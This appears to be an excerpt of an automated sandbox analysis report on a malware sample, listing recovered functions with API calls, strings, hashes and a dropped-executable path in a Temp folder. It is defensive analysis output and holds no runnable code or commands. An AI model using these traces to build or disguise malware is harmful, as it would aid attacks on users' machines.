                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: 395f53575787dba6588f312abc702e351fa947938880f0d51f08c88c420ebde3
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: F12167BA920248EFCB52EFD4C840DDD7BB9AF08340B514166E9199B125EB31DB55CF80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041970A, Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 42983fa42899a2845bcf8f71685504a06bbf48035d5869ea2965793dd411d954
                                                                                                                                            • Instruction ID: 68eb4cd5866e5da1edd4d9018ae4073d6158bda8aeb178e670a8a67cab436560
                                                                                                                                            • Opcode Fuzzy Hash: 42983fa42899a2845bcf8f71685504a06bbf48035d5869ea2965793dd411d954
                                                                                                                                            • Instruction Fuzzy Hash: 2DC104B0A042459FCF15DF99C890BEEBBB4AF49304F04416EE905A7392C7789D86CB6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F900, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F937
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040F93F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F9C8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040F9F3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040FA48
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 1170836740-3733052814
                                                                                                                                            • Opcode ID: 5b87a8de9a3a4e9407a237a14ae48fbdabd4f8c73af1f505a88c9776c8f57c31
                                                                                                                                            • Instruction ID: 894b8edc5c57a2ad9ab008264311dd0855dc9107bafb368bc8a4d607022375e2
                                                                                                                                            • Opcode Fuzzy Hash: 5b87a8de9a3a4e9407a237a14ae48fbdabd4f8c73af1f505a88c9776c8f57c31
                                                                                                                                            • Instruction Fuzzy Hash: 7651B030B00215AFCF24DF29D840A6E7BA5AF44318F14807BE8086BBD2D7799D09CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041AE03, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 91e8f3a483a69edc9125c39a0c4635ecb12dd4f1569a10ebcb46a17e3b56f603
                                                                                                                                            • Instruction ID: 2a1f976b7b4bcbb86613db8ff6b19fd986a78d3bd4204cc8e7b10c550d2c21a6
                                                                                                                                            • Opcode Fuzzy Hash: 91e8f3a483a69edc9125c39a0c4635ecb12dd4f1569a10ebcb46a17e3b56f603
                                                                                                                                            • Instruction Fuzzy Hash: 1851D571A05301AFDB24AF759881AEB7BB4EF45314F0041BFE51097282EB3D89C68A9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0223B053, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction ID: 1392b2d5bbf85628e14ca4388718ab6aa66776e38235571cbe5f8581d5b19296
                                                                                                                                            • Opcode Fuzzy Hash: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction Fuzzy Hash: 3251F2F1E34302EFDB22AFF48880A6D7BB5EF05718F0042BAD8509B199EBB18501CA50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02221E70, Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221EB2
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02221EE3
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221EF1
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221F04
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02221F2E
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 02221F41
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02221FF2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856199767-0
                                                                                                                                            • Opcode ID: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction ID: 974790f6157cc615702805aa7bc3287ce773b8b96ee26846a2e6c7f849f45977
                                                                                                                                            • Opcode Fuzzy Hash: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction Fuzzy Hash: 41517075A00219BFDB20DFE4CC88FAFBBBDEF44244F114169E905A3245EB719E059BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041606C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: cb64fe6ad5cfcc4e8d6b7301ff6b9be212c388882d563f31cd3313a8b65e95eb
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: 6721D871B01231BBCB318B389D41A9B3B689F057A0F270576FD15A7392DB38DD8185E8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B767, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B72F: _free.LIBCMT ref: 0041B754
                                                                                                                                            • _free.LIBCMT ref: 0041B7B5
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B7C0
                                                                                                                                            • _free.LIBCMT ref: 0041B7CB
                                                                                                                                            • _free.LIBCMT ref: 0041B81F
                                                                                                                                            • _free.LIBCMT ref: 0041B82A
                                                                                                                                            • _free.LIBCMT ref: 0041B835
                                                                                                                                            • _free.LIBCMT ref: 0041B840
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 98f77ec76f06077eea1b448944ce58b2e1595b2dcddd0bbe47e22eb6b6d970be
                                                                                                                                            • Instruction ID: ffe7088ae5449a6b3a5a215e186331137a1bbb89884f415634a75f73b0614f0f
                                                                                                                                            • Opcode Fuzzy Hash: 98f77ec76f06077eea1b448944ce58b2e1595b2dcddd0bbe47e22eb6b6d970be
                                                                                                                                            • Instruction Fuzzy Hash: DF116D31540B04EBDA20BFB2CC47FDB77ACDF84744F40481EB2AD6A092EB38A5848694
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00417317, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • __fassign.LIBCMT ref: 0041753E
                                                                                                                                            • __fassign.LIBCMT ref: 0041755B
                                                                                                                                            • WriteFile.KERNEL32(?,00403AF0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175A3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004175E3
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041768F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: 04826751f84c3bf59f43dd3b748ffb43c5ed8974f5c1eec548d02a587f29dd42
                                                                                                                                            • Instruction ID: 2887c3a552ed1fc2b06bfe8e5bf07c6bde8add9ac4243d38c689086ebbc0ae5f
                                                                                                                                            • Opcode Fuzzy Hash: 04826751f84c3bf59f43dd3b748ffb43c5ed8974f5c1eec548d02a587f29dd42
                                                                                                                                            • Instruction Fuzzy Hash: 83D1AE71D052589FCF15CFA8C8809EDBBB5BF49314F28416AE815BB342D734AA86CF58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040FD04, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0040FCFB,0040FB69,0040F477), ref: 0040FD12
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD20
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD39
                                                                                                                                            • SetLastError.KERNEL32(00000000,0040FCFB,0040FB69,0040F477), ref: 0040FD8B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: 8cc6dcbae44a2d52cf8c11f23be7c67a5e481590007d6c0e7033467faf16e6d0
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: 6C0124337093216EE63026766C85AA726A4EF0537A360023FF811656F2EFAE5C87514C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0222FF54, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0222FF4B,0222FDB9,0222F6C7), ref: 0222FF62
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0222FF70
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0222FF89
                                                                                                                                            • SetLastError.KERNEL32(00000000,0222FF4B,0222FDB9,0222F6C7), ref: 0222FFDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: fc80a518e73ff3cca73ff8c53810b37c897c0605c8b2c019a845a0b5cd59cb4b
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: BD0124333383327EE63167F5AD84E2626A5EB06774320023AF510844EDEF92081B9658
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A358, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe, xrefs: 0041A35D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-1858563875
                                                                                                                                            • Opcode ID: 88e97dbcb7a3c732f9e870784d65d818278a6a23f29f598e65e95579bb23bfe8
                                                                                                                                            • Instruction ID: 8fcd5dcc9f5b01b07bd52fb12ed5abbccf50734b0b3ace7a73ab30f581ed808c
                                                                                                                                            • Opcode Fuzzy Hash: 88e97dbcb7a3c732f9e870784d65d818278a6a23f29f598e65e95579bb23bfe8
                                                                                                                                            • Instruction Fuzzy Hash: 6121C5712012157FDB20AF728C849EB77ACEF00368710462AF929C7251E778ECE1C76A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411ACB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                            • Opcode ID: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction ID: 58063f8b226cf6e6d1833e63b29625ed4d015e7c9e48810328c3890537844d72
                                                                                                                                            • Opcode Fuzzy Hash: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction Fuzzy Hash: 49012F37B18237231A141219AC02BAB57998F91BB8727402FFA54F72C0FD5DEC82419C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00410014, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 0-2084034818
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: 0d93d73468b09f87d9ef7135dd4aa8ebd36ada29da4d791985ae1a3ae0162fcd
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: EC11BC31B01225EBDB324B24FC44BAB7BA4AF49760B110122ED45A7350D6B4DDC186DD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004165FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00416612
                                                                                                                                            • GetLastError.KERNEL32(?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104,?), ref: 0041661C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00416623
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: aec222294a0d8ce8b978f308a6de64fd7c5bef6ee438682f18e24d7c61871ae3
                                                                                                                                            • Instruction ID: fe48760646ffff483df900e44d367c1fcd9bf12732390f7954c1140dc131ea13
                                                                                                                                            • Opcode Fuzzy Hash: aec222294a0d8ce8b978f308a6de64fd7c5bef6ee438682f18e24d7c61871ae3
                                                                                                                                            • Instruction Fuzzy Hash: D2F03132200115BB8B215BA6DC0899BFF6DFF453A03168526F51DC7521D736E8A2DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00416665, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001), ref: 0041667B
                                                                                                                                            • GetLastError.KERNEL32(?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104), ref: 00416685
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041668C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: 63806a6c6209ffcbc12013d1ceb7963755303f195f4e24f6a13356c3566b0642
                                                                                                                                            • Instruction ID: 1982b7d424c97b4da265894f81eacb40b146a14d7fee0b0cb49c55dd075f62aa
                                                                                                                                            • Opcode Fuzzy Hash: 63806a6c6209ffcbc12013d1ceb7963755303f195f4e24f6a13356c3566b0642
                                                                                                                                            • Instruction Fuzzy Hash: EBF06231200515BBCB201F62CC04997FF69FF453A43124516F51DC7620C735E8A1DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407AE0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040857A
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1139504419
                                                                                                                                            • Opcode ID: 7830e5d6517efbf6ef1e0939f065e5972ae5a88559e4c9ea959a8c176dd43d04
                                                                                                                                            • Instruction ID: 6e98875f43086b852a1ff0dbe815e623138c5f8adb6bd3c6e19d30da16800a75
                                                                                                                                            • Opcode Fuzzy Hash: 7830e5d6517efbf6ef1e0939f065e5972ae5a88559e4c9ea959a8c176dd43d04
                                                                                                                                            • Instruction Fuzzy Hash: C0F08671A00218A6DB00FF9BD846B9D7BB59B44308FA4452DF504331C2DBBC655487E9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004110C3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004110B8,?,?,00411080,00403AF0,73B76490,?), ref: 004110D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004110EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,004110B8,?,?,00411080,00403AF0,73B76490,?), ref: 0041110E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction ID: 89d1d6a6511906fb8b10b3cdba021d603bd2b1b5d6d269f4ed68b4bcbc4a5649
                                                                                                                                            • Opcode Fuzzy Hash: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction Fuzzy Hash: 94F0A730B00228FBCB21DB60EC09BDFBA78EF04756F520075FA00A1160DB758E01EB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02227250, Relevance: 8.0, APIs: 5, Instructions: 459COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 73be664fff36d98fdd81bda417fd82615685bcef4b50de6d5a22a18df7e17d5e
                                                                                                                                            • Instruction ID: 8ad3bd46f8fc93b03bdac7becc6b786467c7e940b91d4c94c9cad7c6d1f98ebd
                                                                                                                                            • Opcode Fuzzy Hash: 73be664fff36d98fdd81bda417fd82615685bcef4b50de6d5a22a18df7e17d5e
                                                                                                                                            • Instruction Fuzzy Hash: EE02D670E10228ABEF14EFE8C844BDD7BB6EF04304F504458E81567299DB76A68DCF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0223D881, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            • Opcode ID: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction ID: e867acc3524ab95d796c35b399e3f2405890e2f1440d4cc8dacfedfacdc9b18a
                                                                                                                                            • Opcode Fuzzy Hash: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction Fuzzy Hash: C8C149F1A243459FDB26DFF8CC40BEA7BBAAF45314F5440AAD8859724CE7309A46CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00403C30, Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 3731c6bde117b935816b01578708b883aad1c120ed38ca2891ce69254066a0a2
                                                                                                                                            • Instruction ID: fc88b0bca923a07532a6eb78641dceaa207a15a50886e6470e9b438ae10ccdb1
                                                                                                                                            • Opcode Fuzzy Hash: 3731c6bde117b935816b01578708b883aad1c120ed38ca2891ce69254066a0a2
                                                                                                                                            • Instruction Fuzzy Hash: 3E61E271E092089BEB20DF69DC457ADBBB9EB05316F5002BBD804A73C0E7794A8487C9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02231A53, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02231985), ref: 02231A75
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02231ACF
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02231985,?,000000FF,00000000,00000000), ref: 02231B5D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02231B64
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02231BA1
